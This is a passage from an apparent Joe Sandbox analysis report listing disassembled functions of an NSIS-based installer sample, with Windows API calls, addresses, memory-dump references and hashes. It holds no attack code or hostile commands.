                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                                                            Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                                                            Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                                            • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                                            • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                                                            Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                                            • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                                            • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                                                            Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(: Completed,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 004046B2
                                                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID: : Completed$A
                                                                                                                                                                                                                                                                                                                            • API String ID: 3347642858-4013017881
                                                                                                                                                                                                                                                                                                                            • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                                            Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                                            • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                                            Function 00406831 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(: Completed,00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                                            • API String ID: 3581403547-2549942501
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                                                            Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
